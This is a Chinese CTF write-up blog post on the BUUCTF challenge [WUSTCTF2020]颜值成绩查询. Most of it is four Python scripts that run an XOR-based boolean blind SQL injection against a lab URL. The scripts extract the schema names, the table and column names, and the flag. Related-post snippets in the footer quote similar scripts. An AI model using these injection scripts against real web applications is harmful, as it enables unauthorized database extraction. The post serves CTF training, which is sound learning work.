[WUSTCTF2020]颜值成绩查询

最新推荐文章于 2023-10-01 16:39:39 发布
最新推荐文章于 2023-10-01 16:39:39 发布
阅读量256 收藏 1
点赞数 2
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/azraelxuemo/article/details/119023584
版权

一上来可以发现是数字类型盲注
在这里插入图片描述

显示的是1的界面
那么可以利用之前[极客大挑战 2019]FinalSQL1的脚本进行跑
利用^异或进行盲注
首先爆数据库名

import requests
import time

database_all = ''


url = 'http://376446ed-1ae5-48b7-baf6-d78d2d9de0b1.node4.buuoj.cn/?stunum=1'
# 求出总长度的位数,比如说如果总长度为43,那么就是2位数
weishu = ''
for i in range(1, 7):
    sql = "^(substr(bin(ascii(length(length((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA)))))),{},1)=1)^1".format(i)
    re = requests.get(url+sql, timeout=1000)
    if re.status_code == 200:
        if 'admin' in re.text:
            weishu += '1'
        else:
            weishu += '0'
weishu = int(chr(int(weishu, 2)))
# 求出具体的总长度
len = ''
for i in range(1, weishu+1):
    len_wei = ''
    for j in range(1, 7):
        sql = "^(substr(bin(ascii(substr(length((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA))),{},1))),{},1)=1)^1".format(i, j)
        re = requests.get(url+sql, timeout=1000)
        if re.status_code == 200:
            if 'admin' in re.text:
                len_wei += '1'
            else:
                len_wei += '0'
    len += chr(int(len_wei, 2))
for i in range(1, int(len)+1):
    sql = "^(length(bin(ascii(substr((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA)),{},1))))=7)^1".format(i)
    re = requests.get(url+sql, timeout=1000)
    time.sleep(1)
    if re.status_code == 200:
        if 'admin' in re.text:
            len = 7
        else:
            len = 6
    str = ''
    for j in range(1, len+1):
        sql = '^(substr(bin(ascii(substr((select(group_concat(SCHEMA_NAME))from(information_schema.SCHEMATA)),{},1))),{},1)=1)^1'.format(
            i, j)
        re = requests.get(url+sql, timeout=1000)
        time.sleep(1)
        if re.status_code == 200:
            if 'admin' in re.text:
                str += '1'
            else:
                str += '0'
    database_all += chr(int(str, 2))
    print(database_all)

在这里插入图片描述
接着爆表名

import requests
import time

database_all = ''


url = 'http://376446ed-1ae5-48b7-baf6-d78d2d9de0b1.node4.buuoj.cn/?stunum=1'
# 求出总长度的位数,比如说如果总长度为43,那么就是2位数
weishu = ''
for i in range(1, 7):
    sql = "^(substr(bin(ascii(length(length((select(group_concat(TABLE_NAME))from(information_schema.TABLES)where(table_schema='ctf')))))),{},1)=1)^1".format(i)
    re = requests.get(url+sql, timeout=1000)
    if re.status_code == 200:
        if 'admin' in re.text:
            weishu += '1'
        else:
            weishu += '0'
weishu = int(chr(int(weishu, 2)))
# 求出具体的总长度
len = ''
for i in range(1, weishu+1):
    len_wei = ''
    for j in range(1, 7):
        sql = "^(substr(bin(ascii(substr(length((select(group_concat(TABLE_NAME))from(information_schema.TABLES)where(table_schema='ctf'))),{},1))),{},1)=1)^1".format(i, j)
        re = requests.get(url+sql, timeout=1000)
        if re.status_code == 200:
            if 'admin' in re.text:
                len_wei += '1'
            else:
                len_wei += '0'
    len += chr(int(len_wei, 2))
for i in range(1, int(len)+1):
    sql = "^(length(bin(ascii(substr((select(group_concat(TABLE_NAME))from(information_schema.tables)where(table_schema='ctf')),{},1))))=7)^1".format(i)
    re = requests.get(url+sql, timeout=1000)
    time.sleep(1)
    if re.status_code == 200:
        if 'admin' in re.text:
            len = 7
        else:
            len = 6
    str = ''
    for j in range(1, len+1):
        sql = "^(substr(bin(ascii(substr((select(group_concat(TABLE_NAME))from(information_schema.TABLES)where(table_schema='ctf')),{},1))),{},1)=1)^1".format(
            i, j)
        re = requests.get(url+sql, timeout=1000)
        time.sleep(1)
        if re.status_code == 200:
            if 'admin' in re.text:
                str += '1'
            else:
                str += '0'
    database_all += chr(int(str, 2))
    print(database_all)

在这里插入图片描述
接着爆列名

import requests
import time

database_all = ''


url = 'http://376446ed-1ae5-48b7-baf6-d78d2d9de0b1.node4.buuoj.cn/?stunum=1'
# 求出总长度的位数,比如说如果总长度为43,那么就是2位数
weishu = ''
for i in range(1, 7):
    sql = "^(substr(bin(ascii(length(length((select(group_concat(COLUMN_NAME))from(information_schema.COLUMNS)where(table_NAME='flag')))))),{},1)=1)^1".format(i)
    re = requests.get(url+sql, timeout=1000)
    if re.status_code == 200:
        if 'admin' in re.text:
            weishu += '1'
        else:
            weishu += '0'
weishu = int(chr(int(weishu, 2)))
# 求出具体的总长度
len = ''
for i in range(1, weishu+1):
    len_wei = ''
    for j in range(1, 7):
        sql = "^(substr(bin(ascii(substr(length((select(group_concat(COLUMN_NAME))from(information_schema.COLUMNS)where(table_NAME='flag'))),{},1))),{},1)=1)^1".format(i, j)
        re = requests.get(url+sql, timeout=1000)
        if re.status_code == 200:
            if 'admin' in re.text:
                len_wei += '1'
            else:
                len_wei += '0'
    len += chr(int(len_wei, 2))
for i in range(1, int(len)+1):
    sql = "^(length(bin(ascii(substr((select(group_concat(COLUMN_NAME))from(information_schema.COLUMNs)where(table_NAME='flag')),{},1))))=7)^1".format(i)
    re = requests.get(url+sql, timeout=1000)
    time.sleep(1)
    if re.status_code == 200:
        if 'admin' in re.text:
            len = 7
        else:
            len = 6
    str = ''
    for j in range(1, len+1):
        sql = "^(substr(bin(ascii(substr((select(group_concat(COLUMN_NAME))from(information_schema.COLUMNS)where(table_NAME='flag')),{},1))),{},1)=1)^1".format(
            i, j)
        re = requests.get(url+sql, timeout=1000)
        time.sleep(1)
        if re.status_code == 200:
            if 'admin' in re.text:
                str += '1'
            else:
                str += '0'
    database_all += chr(int(str, 2))
    print(database_all)

在这里插入图片描述

爆flag

import requests
import time

database_all = ''


url = 'http://376446ed-1ae5-48b7-baf6-d78d2d9de0b1.node4.buuoj.cn/?stunum=1'
# 求出总长度的位数,比如说如果总长度为43,那么就是2位数
weishu = ''
for i in range(1, 7):
    sql = "^(substr(bin(ascii(length(length((select(group_concat(value))from(ctf.flag)))))),{},1)=1)^1".format(i)
    re = requests.get(url+sql, timeout=1000)
    if re.status_code == 200:
        if 'admin' in re.text:
            weishu += '1'
        else:
            weishu += '0'
weishu = int(chr(int(weishu, 2)))
# 求出具体的总长度
len = ''
for i in range(1, weishu+1):
    len_wei = ''
    for j in range(1, 7):
        sql = "^(substr(bin(ascii(substr(length((select(group_concat(value))from(ctf.flag))),{},1))),{},1)=1)^1".format(i, j)
        re = requests.get(url+sql, timeout=1000)
        if re.status_code == 200:
            if 'admin' in re.text:
                len_wei += '1'
            else:
                len_wei += '0'
    len += chr(int(len_wei, 2))
for i in range(1, int(len)+1):
    sql = "^(length(bin(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))))=7)^1".format(i)
    re = requests.get(url+sql, timeout=1000)
    time.sleep(1)
    if re.status_code == 200:
        if 'admin' in re.text:
            len = 7
        else:
            len = 6
    str = ''
    for j in range(1, len+1):
        sql = "^(substr(bin(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))),{},1)=1)^1".format(
            i, j)
        re = requests.get(url+sql, timeout=1000)
        time.sleep(1)
        if re.status_code == 200:
            if 'admin' in re.text:
                str += '1'
            else:
                str += '0'
    database_all += chr(int(str, 2))
    print(database_all)

在这里插入图片描述

azraelxuemo
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
[WUSTCTF2020]颜值成绩查询 1
qq_51553814的博客
08-22 610
[WUSTCTF2020]颜值成绩查询 1 解题 就是一个布尔盲注,尝试自己写了一下python脚本,磕磕绊绊最后还是写出来了 主要是学了一个二分法,理解了一下 import requests url="http://f8aed0d0-ab96-4a36-8022-2a70701fe282.node4.buuoj.cn:81/?stunum=" name='' for i in range(1,100): print(i) low=32 high=128 mid=(lo
[WUSTCTF2020]颜值成绩查询(布尔注入)
记录学习,一起进步
01-27 695
[WUSTCTF2020]颜值成绩查询(布尔注入)
buuctf-[WUSTCTF2020]颜值成绩查询
最新发布
2202_75317918的博客
10-01 374
当输入的学号不存在时,只会返回“student number not exists.”。猜测是盲注题,因为看不见其他的回显信息,初步想法是构造值为1或0的表达式来进行探测。发现功能就是输入一个学号,然后返回对应的成绩,就是一个简单的查询操作。如果不采用二分法,会跑的很慢。打开环境,随便输个1看看。
re学习笔记(56)WUSTCTF – Re方向WP
12-21
得到flag为wctf2020{cpp_@nd_r3verse_@re_fun} WUSTCTF-re-level1 下载下来压缩包有两个文件,一个是ELF64位,一个是output.txt是程序的输出 IDA64位载入查看main函数 对19位的flag变换后输出,, 写脚本 #include ...
linux操作系统入门实验报告
03-09
一个关于操作系统的入门实验的报告。包括截图的结果,基本指令使用等。
Flash8help_cn.part4
01-13
Flash8help_cn.part4.共有6卷,须全部下载才能解压缩。flash 教程 帮助文档 动漫 计算机
23种设计模式汇集       
07-09
比较系统的讲解了软件设计的23种设计模式,各种例子都有
[WUSTCTF2020]颜值成绩查询 布尔注入二分法
m0_64180167的博客
09-26 152
正确回显 100 错误 显示 not。发现回显了 我们可以开始编写脚本跑了。这道题很简单 就是sql注入。我们来学习一下如何写盲注脚本。接下来就是爆破表和字段了。我们使用二分法来写一遍。这里很显然就是盲注了。回显了 就拿这个去咯。
SQL布尔盲注 —— 【WUST-CTF2020】颜值成绩查询
Ve99tr’s Blog
03-30 1863
sql布尔盲注
[WUSTCTF2020]颜值成绩
shinygod的博客
04-09 406
知识点:布尔盲注 当我们输入1,2,3,4的时候都有回显,但是当输入5的时候会回显 判断布尔盲注,测试一波 这种显示不存在 1'and length(database()) >1# 当用异或注入的时候显示正确1^1^1,并回显Hi admin,这样我们就可以由此来盲注。 import re import requests import string url = "http://ebb62726-0fba-430e-bf27-5e7214c31577.node4.buuoj.cn:81/" f
[WUSTCTF2020]颜值成绩查询 布尔盲注
qq_37301470的博客
12-02 243
[WUSTCTF2020]颜值成绩查询 只有一个输入框,是sql注入题目 尝试输入1,2,3 可以发现是get方法提交的参数且是数字型 故用hackbar /?stunum=1 or 1=2 %23 student number not exists. 刚刚还可以查到现在查不到了判断存在过滤 尝试下发现是空格 上盲注脚本 import string import requests select=f"select/**/value/**/from/**/flag" ans="" for i in ran
[WUSTCTF2020]朴实无华
09-19
[WUSTCTF2020]朴实无华是一道CTF比赛的题目。根据给出的代码,该题目包含三个关卡。在第一个关卡中,如果传入的参数$num的整数值小于2020且大于2021,会输出一条特定的字符串。在第二个关卡中,如果传入的参数$md5的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值